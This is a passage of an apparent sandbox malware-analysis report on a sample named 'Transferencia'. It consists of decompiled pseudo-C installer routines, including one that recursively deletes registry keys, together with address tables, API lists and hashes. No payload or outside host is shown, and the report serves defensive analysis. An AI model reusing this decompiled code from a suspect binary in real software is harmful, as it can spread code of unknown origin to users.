                                                						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                							_t48 = E732A3070(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E732A30A0(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E732A2EE0(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E732A2F90(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                					if( *((short*)(_t81 + 2)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E732A2EA0(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}





























                                                0x732a1979
                                                0x732a1983
                                                0x732a198c
                                                0x732a198f
                                                0x732a1994
                                                0x732a199d
                                                0x732a19a6
                                                0x732a19a8
                                                0x732a19af
                                                0x732a19b1
                                                0x732a19b4
                                                0x732a19bb
                                                0x732a19c9
                                                0x732a19d2
                                                0x732a19d7
                                                0x732a19da
                                                0x732a19e0
                                                0x732a19e0
                                                0x732a19e3
                                                0x732a19e6
                                                0x732a19e9
                                                0x732a1ab1
                                                0x732a1ab1
                                                0x732a1ab4
                                                0x732a1b34
                                                0x732a1b39
                                                0x732a1b48
                                                0x732a1b4b
                                                0x732a1b53
                                                0x732a1b53
                                                0x732a1b53
                                                0x732a1b55
                                                0x732a1b55
                                                0x732a1b56
                                                0x732a1b56
                                                0x732a1b58
                                                0x732a1b5a
                                                0x732a1b60
                                                0x732a1b69
                                                0x732a1b7a
                                                0x732a1b85
                                                0x732a1b85
                                                0x732a1b4d
                                                0x732a1b2f
                                                0x732a1b2f
                                                0x732a1b31
                                                0x732a1b31
                                                0x00000000
                                                0x732a1b31
                                                0x732a1b4f
                                                0x732a1b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1b51
                                                0x732a1b3d
                                                0x732a1b41
                                                0x00000000
                                                0x732a1b41
                                                0x732a1ab6
                                                0x732a1ab6
                                                0x732a1ab7
                                                0x732a1b26
                                                0x732a1b28
                                                0x00000000
                                                0x00000000
                                                0x732a1b2a
                                                0x732a1b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1b2d
                                                0x732a1ab9
                                                0x732a1ab9
                                                0x732a1aba
                                                0x732a1af7
                                                0x732a1afc
                                                0x732a1b19
                                                0x732a1b1c
                                                0x00000000
                                                0x00000000
                                                0x732a1b1e
                                                0x00000000
                                                0x00000000
                                                0x732a1b20
                                                0x732a1b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1b24
                                                0x732a1afe
                                                0x732a1b03
                                                0x732a1b05
                                                0x732a1b07
                                                0x732a1b09
                                                0x732a1b12
                                                0x732a1b0b
                                                0x732a1b0b
                                                0x732a1b0b
                                                0x00000000
                                                0x732a1b09
                                                0x732a1abc
                                                0x732a1abc
                                                0x732a1abf
                                                0x732a1af0
                                                0x732a1af2
                                                0x00000000
                                                0x732a1af2
                                                0x732a1ac1
                                                0x732a1ac1
                                                0x732a1ac4
                                                0x732a1ad7
                                                0x732a1adc
                                                0x732a1ae9
                                                0x732a1aeb
                                                0x00000000
                                                0x732a1aeb
                                                0x732a1ade
                                                0x732a1ae0
                                                0x00000000
                                                0x00000000
                                                0x732a1ae2
                                                0x732a1ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1ae7
                                                0x732a1ac7
                                                0x732a1ac8
                                                0x732a1ace
                                                0x732a1ad0
                                                0x732a1ad0
                                                0x00000000
                                                0x732a1ac8
                                                0x732a19ef
                                                0x732a1a68
                                                0x732a1a6a
                                                0x732a1a6d
                                                0x732a1a8b
                                                0x732a1a8e
                                                0x732a1a94
                                                0x732a1a99
                                                0x732a1a6f
                                                0x732a1a6f
                                                0x732a1a73
                                                0x732a1a77
                                                0x732a1a79
                                                0x732a1a79
                                                0x732a1a9c
                                                0x732a1aa0
                                                0x00000000
                                                0x732a1aa6
                                                0x732a1aa6
                                                0x732a1aa9
                                                0x00000000
                                                0x732a1aa9
                                                0x732a1aa0
                                                0x732a19f1
                                                0x732a19f4
                                                0x732a1a59
                                                0x732a1a5b
                                                0x732a1a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1a63
                                                0x732a19f6
                                                0x732a19f9
                                                0x00000000
                                                0x00000000
                                                0x732a19fb
                                                0x732a19fc
                                                0x732a1a32
                                                0x732a1a37
                                                0x732a1a4f
                                                0x732a1a51
                                                0x00000000
                                                0x732a1a51
                                                0x732a1a39
                                                0x732a1a3b
                                                0x00000000
                                                0x00000000
                                                0x732a1a41
                                                0x732a1a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1a4a
                                                0x732a19fe
                                                0x732a1a01
                                                0x732a1a28
                                                0x00000000
                                                0x732a1a03
                                                0x732a1a03
                                                0x732a1a04
                                                0x732a1a18
                                                0x732a1a1a
                                                0x732a1a06
                                                0x732a1a08
                                                0x732a1a0e
                                                0x732a1a10
                                                0x732a1a10
                                                0x732a1a08
                                                0x00000000
                                                0x732a1a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 7be8471919947167827806dc5bbf3bc21910229860bae31ff55c89f5c584ba52
                                                • Instruction ID: 940487da9a29201697f582f44575af32409bd623b01b4f41d6b63f1bd0728d04
                                                • Opcode Fuzzy Hash: 7be8471919947167827806dc5bbf3bc21910229860bae31ff55c89f5c584ba52
                                                • Instruction Fuzzy Hash: 1F51F732F1011AABDB029FAC844079DBBFAEB44330F188959DC07B3294E6B5B9C5C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E732A2480(void* __edx) {
                                                				void* _t37;
                                                				signed int _t38;
                                                				void* _t39;
                                                				void* _t41;
                                                				signed char* _t42;
                                                				signed char* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[0x18];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t41 = 0x1a;
                                                					if(_t52 == _t41) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[0x18] = _t41;
                                                							goto L12;
                                                						} else {
                                                							_t37 = E732A135A(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t37 = E732A12E3();
                                                						L11:
                                                						_t52 = _t37;
                                                						L12:
                                                						_t13 =  &(_t51[8]); // 0x1020
                                                						_t42 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t38 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = 0;
                                                						if(_t38 > 7) {
                                                							L27:
                                                							_t39 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t39;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t38 * 4 +  &M732A25F8))) {
                                                								case 0:
                                                									 *_t42 = 0;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E732A13B1(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E732A13B1(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x732a506c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x732a506c, __eax,  *0x732a506c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E732A12CC(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if( *__ebp != __cx) {
                                                										__eax = E732A13B1(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x732a506c =  *0x732a5074 + ( *(__esi + 0x18) - 1) *  *0x732a506c * 2 + 0x18;
                                                									 *__ebx =  *0x732a5074 + ( *(__esi + 0x18) - 1) *  *0x732a506c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E732A1510(__edx,  *0x732a5074 + ( *(__esi + 0x18) - 1) *  *0x732a506c * 2 + 0x18, __edx,  *0x732a5074 + ( *(__esi + 0x18) - 1) *  *0x732a506c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t37 = E732A12CC(0x732a5044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x732a2494
                                                0x732a2498
                                                0x732a24a3
                                                0x732a24a3
                                                0x732a24aa
                                                0x732a24af
                                                0x00000000
                                                0x00000000
                                                0x732a24b3
                                                0x732a24b6
                                                0x00000000
                                                0x00000000
                                                0x732a24bb
                                                0x732a24c6
                                                0x732a24d6
                                                0x00000000
                                                0x732a24cd
                                                0x732a24cf
                                                0x732a24e5
                                                0x00000000
                                                0x732a24e5
                                                0x732a24bd
                                                0x732a24bd
                                                0x732a24e6
                                                0x732a24e6
                                                0x732a24e8
                                                0x732a24ec
                                                0x732a24ec
                                                0x732a24ef
                                                0x732a24ef
                                                0x732a24f7
                                                0x732a24ff
                                                0x732a2502
                                                0x732a25c1
                                                0x732a25c2
                                                0x732a25cd
                                                0x732a25f7
                                                0x732a25f7
                                                0x732a25dd
                                                0x732a25e9
                                                0x732a25df
                                                0x732a25df
                                                0x732a25df
                                                0x00000000
                                                0x732a2508
                                                0x732a2508
                                                0x00000000
                                                0x732a250f
                                                0x00000000
                                                0x00000000
                                                0x732a2517
                                                0x00000000
                                                0x00000000
                                                0x732a2525
                                                0x732a2527
                                                0x00000000
                                                0x00000000
                                                0x732a2548
                                                0x732a254e
                                                0x732a2551
                                                0x732a2553
                                                0x732a2563
                                                0x00000000
                                                0x00000000
                                                0x732a2530
                                                0x732a2535
                                                0x732a2538
                                                0x732a2539
                                                0x00000000
                                                0x00000000
                                                0x732a256f
                                                0x732a2575
                                                0x732a2576
                                                0x732a2579
                                                0x732a257a
                                                0x732a257c
                                                0x00000000
                                                0x00000000
                                                0x732a2588
                                                0x732a258b
                                                0x732a2597
                                                0x732a2599
                                                0x00000000
                                                0x00000000
                                                0x732a25a5
                                                0x732a25b1
                                                0x732a25b4
                                                0x732a25b6
                                                0x732a25b9
                                                0x00000000
                                                0x00000000
                                                0x732a2508
                                                0x732a2502
                                                0x732a24db
                                                0x732a24e0
                                                0x00000000
                                                0x732a24e0

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 732A25C2
                                                  • Part of subcall function 732A12CC: lstrcpynW.KERNEL32(00000000,?,732A137F,00000019,732A11CA,-000000A0), ref: 732A12DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 732A2548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 732A2563
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: 77fe7c19931b911eaab5b9973028d0907544ed165bb3ff304df25d876d33a27e
                                                • Instruction ID: b109dc66d3bacb06cd4265da878fad3ad8bcfd644ee1591b1ef0f41c4790d98c
                                                • Opcode Fuzzy Hash: 77fe7c19931b911eaab5b9973028d0907544ed165bb3ff304df25d876d33a27e
                                                • Instruction Fuzzy Hash: C541B1B1508309DFE719EF2DD844B2677F8FB88310F10891EED4AA6681E774A5C4EB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				short _v536;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v536);
                                                						_push(0);
                                                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v536);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E004068E7(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyW(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: e3874647b70fc3bb13da35da8902fd1ce062095075b440694413d8eb29dad5c0
                                                • Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
                                                • Opcode Fuzzy Hash: e3874647b70fc3bb13da35da8902fd1ce062095075b440694413d8eb29dad5c0
                                                • Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				WCHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t60;
                                                				long _t63;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                				} else {
                                                					E00402D84(2);
                                                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x24);
                                                				 *(_t65 + 8) = _t30;
                                                				_t60 = _t55 & 0x00000004;
                                                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402DA6(0x11);
                                                				}
                                                				 *(_t65 - 0x44) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                				asm("sbb esi, esi");
                                                				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                					_push(_t63);
                                                					E00406461();
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: a6aad87a710fcdef47f5999398108e389655c35983e9ac7c8f9262d328879ae0
                                                • Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
                                                • Opcode Fuzzy Hash: a6aad87a710fcdef47f5999398108e389655c35983e9ac7c8f9262d328879ae0
                                                • Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
                                                				void* __edi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				void* _t31;
                                                				struct HDC__* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t33 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402D84(2);
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t33);
                                                				 *0x40cdd8 = E00402D84(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				 *0x40cddf = 1;
                                                				 *0x40cddc = _t15 & 0x00000001;
                                                				 *0x40cddd = _t15 & 0x00000002;
                                                				 *0x40cdde = _t15 & 0x00000004;
                                                				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                                                				_t18 = CreateFontIndirectW(0x40cdc8);
                                                				_push(_t18);
                                                				_push(_t31);
                                                				E00406461();
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                • ReleaseDC.USER32 ref: 00401E84
                                                  • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                  • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
